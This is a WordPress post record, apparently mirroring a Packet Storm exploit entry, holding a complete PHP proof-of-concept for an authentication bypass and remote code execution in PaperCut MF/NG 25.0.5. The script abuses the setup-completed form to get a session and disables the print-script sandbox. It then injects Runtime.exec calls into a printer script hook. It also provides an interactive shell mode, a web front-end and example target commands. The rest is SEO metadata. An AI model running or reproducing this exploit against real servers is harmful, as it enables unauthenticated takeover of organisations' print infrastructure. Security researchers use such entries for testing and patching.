{"id":41165,"date":"2026-02-17T12:46:09","date_gmt":"2026-02-17T12:46:09","guid":{"rendered":"http:\/\/localhost\/?p=41165"},"modified":"2026-02-17T12:46:09","modified_gmt":"2026-02-17T12:46:09","slug":"papercut-mfng-2505-authentication-bypass-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41165","title":{"rendered":"\ud83d\udcc4 PaperCut MF\/NG 25.0.5 Authentication Bypass \/ Remote Code Execution_PACKETSTORM:215739"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-17T18:13:17&#8243;,&#8221;description&#8221;:&#8221;A critical security vulnerability was discovered in version 25.0.5 of PaperCut MF\/NG that allows attackers to bypass authentication and execute remote commands on the target system without requiring any credentials&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-17T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-17T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 PaperCut MF\/NG 25.0.5 Authentication Bypass \/ Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215739&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : PaperCut MF\/NG 25.0.5 Authentication Bypass                                                                                 |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.papercut.com\/                                                                                                   |\\n    =============================================================================================================================================\\n    \\n    [+] Summary : \\n              \\n               A critical security vulnerability was discovered in version 25.0.5 of PaperCut MF\/NG \\n    \\t\\t   that allows attackers to bypass authentication and execute remote commands on the target system without requiring any credentials.\\n    \\t\\t  \\n    [+]  POC : php poc.php\\n    \\n    \\u003c?php\\n    \\n    class PaperCutExploit {\\n        private $target;\\n        private $session;\\n        \\n        public function __construct($target_url) {\\n            $this-\\u003etarget = rtrim($target_url, &#8216;\/&#8217;);\\n            $this-\\u003esession = curl_init();\\n            \\n            curl_setopt_array($this-\\u003esession, [\\n                CURLOPT_RETURNTRANSFER =\\u003e true,\\n                CURLOPT_FOLLOWLOCATION =\\u003e true,\\n                CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n                CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n                CURLOPT_TIMEOUT =\\u003e 30,\\n                CURLOPT_USERAGENT =\\u003e &#8216;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36&#8217;,\\n                CURLOPT_COOKIEJAR =\\u003e &#8216;cookies.txt&#8217;,\\n                CURLOPT_COOKIEFILE =\\u003e &#8216;cookies.txt&#8217;\\n            ]);\\n        }\\n        \\n        public function get_session_id() {\\n            echo \\&#8221;[*] Attempting authentication bypass&#8230;\\\\n\\&#8221;;\\n        \\n            $url = $this-\\u003etarget . &#8216;\/app?service=page\/SetupCompleted&#8217;;\\n            \\n            curl_setopt_array($this-\\u003esession, [\\n                CURLOPT_URL =\\u003e $url,\\n                CURLOPT_HTTPGET =\\u003e true\\n            ]);\\n            \\n            $response = curl_exec($this-\\u003esession);\\n        \\n            $post_data = [\\n                &#8216;service&#8217; =\\u003e &#8216;direct\/1\/SetupCompleted\/$Form&#8217;,\\n                &#8216;sp&#8217; =\\u003e &#8216;S0&#8217;,\\n                &#8216;Form0&#8217; =\\u003e &#8216;$Hidden,analyticsEnabled,$Submit&#8217;,\\n                &#8216;$Hidden&#8217; =\\u003e &#8216;true&#8217;,\\n                &#8216;$Submit&#8217; =\\u003e &#8216;Login&#8217;\\n            ];\\n            \\n            $headers = [\\n                &#8216;Origin: &#8216; . $this-\\u003etarget,\\n                &#8216;Content-Type: application\/x-www-form-urlencoded&#8217;\\n            ];\\n            \\n            curl_setopt_array($this-\\u003esession, [\\n                CURLOPT_URL =\\u003e $this-\\u003etarget . &#8216;\/app&#8217;,\\n                CURLOPT_POST =\\u003e true,\\n                CURLOPT_POSTFIELDS =\\u003e http_build_query($post_data),\\n                CURLOPT_HTTPHEADER =\\u003e $headers\\n            ]);\\n            \\n            $response = curl_exec($this-\\u003esession);\\n            $http_code = curl_getinfo($this-\\u003esession, CURLINFO_HTTP_CODE);\\n    \\n            if ($http_code == 200 \\u0026\\u0026 strpos($response, &#8216;papercut&#8217;) !== false) {\\n    \\n                $cookies = curl_getinfo($this-\\u003esession, CURLINFO_COOKIELIST);\\n                foreach ($cookies as $cookie) {\\n                    if (strpos($cookie, &#8216;JSESSIONID&#8217;) !== false) {\\n                        echo \\&#8221;[+] Authentication bypass successful! Obtained JSESSIONID\\\\n\\&#8221;;\\n                        return true;\\n                    }\\n                }\\n            }\\n            \\n            echo \\&#8221;[-] Authentication bypass failed\\\\n\\&#8221;;\\n            return false;\\n        }\\n        \\n        public function set_setting($setting, $enabled) {\\n            echo \\&#8221;[*] Updating {$setting} to {$enabled}\\\\n\\&#8221;;\\n    \\n            $post_data = [\\n                &#8216;service&#8217; =\\u003e &#8216;direct\/1\/ConfigEditor\/quickFindForm&#8217;,\\n                &#8216;sp&#8217; =\\u003e &#8216;S0&#8217;,\\n                &#8216;Form0&#8217; =\\u003e &#8216;$TextField,doQuickFind,clear&#8217;,\\n                &#8216;$TextField&#8217; =\\u003e $setting,\\n                &#8216;doQuickFind&#8217; =\\u003e &#8216;Go&#8217;\\n            ];\\n            \\n            $headers = [\\n                &#8216;Origin: &#8216; . $this-\\u003etarget,\\n                &#8216;Content-Type: application\/x-www-form-urlencoded&#8217;\\n            ];\\n            \\n            curl_setopt_array($this-\\u003esession, [\\n                CURLOPT_URL =\\u003e $this-\\u003etarget . &#8216;\/app&#8217;,\\n                CURLOPT_POST =\\u003e true,\\n                CURLOPT_POSTFIELDS =\\u003e http_build_query($post_data),\\n                CURLOPT_HTTPHEADER =\\u003e $headers\\n            ]);\\n            \\n            $response = curl_exec($this-\\u003esession);\\n    \\n            $post_data = [\\n                &#8216;service&#8217; =\\u003e &#8216;direct\/1\/ConfigEditor\/$Form&#8217;,\\n                &#8216;sp&#8217; =\\u003e &#8216;S1&#8217;,\\n                &#8216;Form1&#8217; =\\u003e &#8216;$TextField$0,$Submit,$Submit$0&#8217;,\\n                &#8216;$TextField$0&#8217; =\\u003e $enabled,\\n                &#8216;$Submit&#8217; =\\u003e &#8216;Update&#8217;\\n            ];\\n            \\n            curl_setopt_array($this-\\u003esession, [\\n                CURLOPT_POSTFIELDS =\\u003e http_build_query($post_data)\\n            ]);\\n            \\n            $response = curl_exec($this-\\u003esession);\\n            \\n            if (strpos($response, &#8216;Updated successfully&#8217;) !== false) {\\n                echo \\&#8221;[+] Setting updated successfully\\\\n\\&#8221;;\\n                return true;\\n            }\\n            \\n            echo \\&#8221;[-] Failed to update setting\\\\n\\&#8221;;\\n            return false;\\n        }\\n        \\n        public function execute_command($command) {\\n            echo \\&#8221;[*] Preparing to execute command: {$command}\\\\n\\&#8221;;\\n    \\n            $this-\\u003eset_setting(&#8216;print-and-device.script.enabled&#8217;, &#8216;Y&#8217;);\\n            $this-\\u003eset_setting(&#8216;print.script.sandboxed&#8217;, &#8216;N&#8217;);\\n            \\n            \/\/ Navigate to printer configuration\\n            $steps = [\\n                &#8216;\/app?service=page\/PrinterList&#8217;,\\n                &#8216;\/app?service=direct\/1\/PrinterList\/selectPrinter\\u0026sp=l1001&#8217;,\\n                &#8216;\/app?service=direct\/1\/PrinterDetails\/printerOptionsTab.tab\\u0026sp=4&#8217;\\n            ];\\n            \\n            foreach ($steps as $step) {\\n                curl_setopt_array($this-\\u003esession, [\\n                    CURLOPT_URL =\\u003e $this-\\u003etarget . $step,\\n                    CURLOPT_HTTPGET =\\u003e true,\\n                    CURLOPT_POSTFIELDS =\\u003e null\\n                ]);\\n                curl_exec($this-\\u003esession);\\n            }\\n    \\n            $script_body = \\&#8221;function printJobHook(inputs, actions) {}\\\\r\\\\n\\&#8221; .\\n                          \\&#8221;java.lang.Runtime.getRuntime().exec(&#8216;{$command}&#8217;);\\&#8221;;\\n            \\n            $post_data = [\\n                &#8216;service&#8217; =\\u003e &#8216;direct\/1\/PrinterDetails\/$PrinterDetailsScript.$Form&#8217;,\\n                &#8216;sp&#8217; =\\u003e &#8216;S0&#8217;,\\n                &#8216;Form0&#8217; =\\u003e &#8216;printerId,enablePrintScript,scriptBody,$Submit,$Submit$0,$Submit$1&#8217;,\\n                &#8216;printerId&#8217; =\\u003e &#8216;l1001&#8217;,\\n                &#8216;enablePrintScript&#8217; =\\u003e &#8216;on&#8217;,\\n                &#8216;scriptBody&#8217; =\\u003e $script_body,\\n                &#8216;$Submit$1&#8217; =\\u003e &#8216;Apply&#8217;\\n            ];\\n            \\n            $headers = [\\n                &#8216;Origin: &#8216; . $this-\\u003etarget,\\n                &#8216;Content-Type: application\/x-www-form-urlencoded&#8217;\\n            ];\\n            \\n            curl_setopt_array($this-\\u003esession, [\\n                CURLOPT_URL =\\u003e $this-\\u003etarget . &#8216;\/app&#8217;,\\n                CURLOPT_POST =\\u003e true,\\n                CURLOPT_POSTFIELDS =\\u003e http_build_query($post_data),\\n                CURLOPT_HTTPHEADER =\\u003e $headers\\n            ]);\\n            \\n            $response = curl_exec($this-\\u003esession);\\n            \\n            if (strpos($response, &#8216;Saved successfully&#8217;) !== false) {\\n                echo \\&#8221;[+] Command executed successfully!\\\\n\\&#8221;;\\n    \\n                $this-\\u003eset_setting(&#8216;print-and-device.script.enabled&#8217;, &#8216;N&#8217;);\\n                $this-\\u003eset_setting(&#8216;print.script.sandboxed&#8217;, &#8216;Y&#8217;);\\n                \\n                return true;\\n            } else {\\n                echo \\&#8221;[-] Command execution failed &#8211; printer might not be configured\\\\n\\&#8221;;\\n                echo \\&#8221;[*] Try manually adding a printer in PaperCut admin interface\\\\n\\&#8221;;\\n                return false;\\n            }\\n        }\\n        \\n        public function exploit($command) {\\n            if (!$this-\\u003eget_session_id()) {\\n                return false;\\n            }\\n            \\n            return $this-\\u003eexecute_command($command);\\n        }\\n        \\n        public function interactive_shell() {\\n            echo \\&#8221;[+] Starting interactive shell. Type &#8216;exit&#8217; to quit.\\\\n\\&#8221;;\\n            \\n            while (true) {\\n                echo \\&#8221;papercut\\u003e \\&#8221;;\\n                $command = trim(fgets(STDIN));\\n                \\n                if ($command === &#8216;exit&#8217;) {\\n                    break;\\n                }\\n                \\n                if (!empty($command)) {\\n                    $this-\\u003eexecute_command($command);\\n                }\\n            }\\n        }\\n        \\n        public function __destruct() {\\n            if ($this-\\u003esession) {\\n                curl_close($this-\\u003esession);\\n            }\\n            if (file_exists(&#8216;cookies.txt&#8217;)) {\\n                unlink(&#8216;cookies.txt&#8217;);\\n            }\\n        }\\n    }\\n    \\n    if (php_sapi_name() === &#8216;cli&#8217;) {\\n        echo \\&#8221;\\n     \u2588\u2588\u2557\u2588\u2588\u2588\u2557   \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557   \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557  \u2588\u2588\u2557\u2588\u2588\u2557  \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \\n     \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557  \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2554\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\\n     \u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588   \u2588\u2554\u255d\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2554\u255d \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\\n     \u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551   \u2588\u2588\u2551\u2588\u2588\u2551   \u2588\u2588\u2551\u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2588\u2588\u2557 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\\n     \u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551  \u2588\u2588\u2551\u2588\u2588\u2551  \u2588\u2588\u2557\u2588\u2588\u2551  \u2588\u2588\u2551\\n     \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d  \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\u255a\u2550\u255d  \u255a\u2550\u255d\\n        \\n        PaperCut MF\/NG Unauthenticated RCE Exploit\\n        \\n        By: indoushka\\n        \\\\n\\&#8221;;\\n        \\n        $options = getopt(\\&#8221;u:c:ih\\&#8221;, [\\n            \\&#8221;url:\\&#8221;,\\n            \\&#8221;command:\\&#8221;,\\n            \\&#8221;interactive\\&#8221;,\\n            \\&#8221;help\\&#8221;\\n        ]);\\n        \\n        if (isset($options[&#8216;h&#8217;]) || isset($options[&#8216;help&#8217;]) || $argc == 1) {\\n            echo \\&#8221;Usage: php poc.php [options]\\\\n\\&#8221;;\\n            echo \\&#8221;Options:\\\\n\\&#8221;;\\n            echo \\&#8221;  -u, &#8211;url         Target URL (required)\\\\n\\&#8221;;\\n            echo \\&#8221;  -c, &#8211;command     Command to execute\\\\n\\&#8221;;\\n            echo \\&#8221;  -i, &#8211;interactive Start interactive shell\\\\n\\&#8221;;\\n            echo \\&#8221;  -h, &#8211;help        Show this help message\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\nExamples:\\\\n\\&#8221;;\\n            echo \\&#8221;  php poc.php -u https:\/\/papercut.company.com -c &#8216;whoami&#8217;\\\\n\\&#8221;;\\n            echo \\&#8221;  php poc.php -u http:\/\/192.168.1.100:9191 -c &#8216;ipconfig&#8217;\\\\n\\&#8221;;\\n            echo \\&#8221;  php poc.php -u https:\/\/papercut.target.com -i\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n        \\n        if (!isset($options[&#8216;u&#8217;]) \\u0026\\u0026 !isset($options[&#8216;url&#8217;])) {\\n            echo \\&#8221;Error: Target URL is required\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n        \\n        $target = isset($options[&#8216;u&#8217;]) ? $options[&#8216;u&#8217;] : $options[&#8216;url&#8217;];\\n        $command = isset($options[&#8216;c&#8217;]) ? $options[&#8216;c&#8217;] : (isset($options[&#8216;command&#8217;]) ? $options[&#8216;command&#8217;] : &#8216;whoami&#8217;);\\n        \\n        $exploit = new PaperCutExploit($target);\\n        \\n        if (isset($options[&#8216;i&#8217;]) || isset($options[&#8216;interactive&#8217;])) {\\n            if ($exploit-\\u003eexploit(&#8216;echo \\&#8221;Interactive shell started\\&#8221;&#8216;)) {\\n                $exploit-\\u003einteractive_shell();\\n            }\\n        } else {\\n            $exploit-\\u003eexploit($command);\\n        }\\n        \\n    } else {\\n    \\n        if (isset($_POST[&#8216;exploit&#8217;])) {\\n            $target = $_POST[&#8216;target&#8217;] ?? &#8221;;\\n            $command = $_POST[&#8216;command&#8217;] ?? &#8216;whoami&#8217;;\\n            \\n            if ($target) {\\n                $exploit = new PaperCutExploit($target);\\n                \\n                ob_start();\\n                $result = $exploit-\\u003eexploit($command);\\n                $output = ob_get_clean();\\n                \\n                echo \\&#8221;\\u003cpre\\u003e$output\\u003c\/pre\\u003e\\&#8221;;\\n            } else {\\n                echo \\&#8221;\\u003cdiv style=&#8217;color: red;&#8217;\\u003eTarget URL is required\\u003c\/div\\u003e\\&#8221;;\\n            }\\n        } else {\\n            echo &#8216;\\u003c!DOCTYPE html\\u003e\\n            \\u003chtml\\u003e\\n            \\u003chead\\u003e\\n                \\u003ctitle\\u003ePaperCut RCE Exploit\\u003c\/title\\u003e\\n                \\u003cstyle\\u003e\\n                    body { font-family: Arial, sans-serif; margin: 40px; }\\n                    .container { max-width: 600px; margin: 0 auto; }\\n                    .form-group { margin-bottom: 15px; }\\n                    label { display: block; margin-bottom: 5px; font-weight: bold; }\\n                    input[type=\\&#8221;text\\&#8221;] { \\n                        width: 100%; padding: 8px; border: 1px solid #ddd; border-radius: 4px; \\n                    }\\n                    button { \\n                        background: #007cba; color: white; padding: 10px 20px; \\n                        border: none; border-radius: 4px; cursor: pointer; \\n                    }\\n                \\u003c\/style\\u003e\\n            \\u003c\/head\\u003e\\n            \\u003cbody\\u003e\\n                \\u003cdiv class=\\&#8221;container\\&#8221;\\u003e\\n                    \\u003ch1\\u003ePaperCut MF\/NG RCE Exploit\\u003c\/h1\\u003e\\n                    \\u003cform method=\\&#8221;post\\&#8221;\\u003e\\n                        \\u003cinput type=\\&#8221;hidden\\&#8221; name=\\&#8221;exploit\\&#8221; value=\\&#8221;1\\&#8221;\\u003e\\n                        \\n                        \\u003cdiv class=\\&#8221;form-group\\&#8221;\\u003e\\n                            \\u003clabel for=\\&#8221;target\\&#8221;\\u003eTarget URL:\\u003c\/label\\u003e\\n                            \\u003cinput type=\\&#8221;text\\&#8221; id=\\&#8221;target\\&#8221; name=\\&#8221;target\\&#8221; placeholder=\\&#8221;https:\/\/papercut.company.com:9191\\&#8221; required\\u003e\\n                        \\u003c\/div\\u003e\\n                        \\n                        \\u003cdiv class=\\&#8221;form-group\\&#8221;\\u003e\\n                            \\u003clabel for=\\&#8221;command\\&#8221;\\u003eCommand:\\u003c\/label\\u003e\\n                            \\u003cinput type=\\&#8221;text\\&#8221; id=\\&#8221;command\\&#8221; name=\\&#8221;command\\&#8221; value=\\&#8221;whoami\\&#8221;\\u003e\\n                        \\u003c\/div\\u003e\\n                        \\n                        \\u003cbutton type=\\&#8221;submit\\&#8221;\\u003eExecute Exploit\\u003c\/button\\u003e\\n                    \\u003c\/form\\u003e\\n                \\u003c\/div\\u003e\\n            \\u003c\/body\\u003e\\n            \\u003c\/html\\u003e&#8217;;\\n        }\\n    }\\n    ?\\u003e\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215739&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215739\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-17T18:13:17&#8243;,&#8221;description&#8221;:&#8221;A critical security vulnerability was discovered in version 25.0.5 of PaperCut MF\/NG that allows attackers to bypass authentication and execute remote commands on the target&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-41165","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 PaperCut MF\/NG 25.0.5 Authentication Bypass \/ Remote Code Execution_PACKETSTORM:215739 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41165\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 PaperCut MF\/NG 25.0.5 Authentication Bypass \/ Remote Code Execution_PACKETSTORM:215739 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-17T18:13:17&#8243;,&#8221;description&#8221;:&#8221;A critical security vulnerability was discovered in version 25.0.5 of PaperCut MF\/NG that allows attackers to bypass authentication and execute remote commands on the target...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41165\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-17T12:46:09+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41165#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41165\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 PaperCut MF\\\/NG 25.0.5 Authentication Bypass \\\/ Remote Code Execution_PACKETSTORM:215739\",\"datePublished\":\"2026-02-17T12:46:09+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41165\"},\"wordCount\":1740,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41165#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41165\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41165\",\"name\":\"\ud83d\udcc4 PaperCut MF\\\/NG 25.0.5 Authentication Bypass \\\/ Remote Code Execution_PACKETSTORM:215739 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-17T12:46:09+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41165#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41165\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41165#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 PaperCut MF\\\/NG 25.0.5 Authentication Bypass \\\/ Remote Code Execution_PACKETSTORM:215739\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 PaperCut MF\/NG 25.0.5 Authentication Bypass \/ Remote Code Execution_PACKETSTORM:215739 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41165","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 PaperCut MF\/NG 25.0.5 Authentication Bypass \/ Remote Code Execution_PACKETSTORM:215739 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-17T18:13:17&#8243;,&#8221;description&#8221;:&#8221;A critical security vulnerability was discovered in version 25.0.5 of PaperCut MF\/NG that allows attackers to 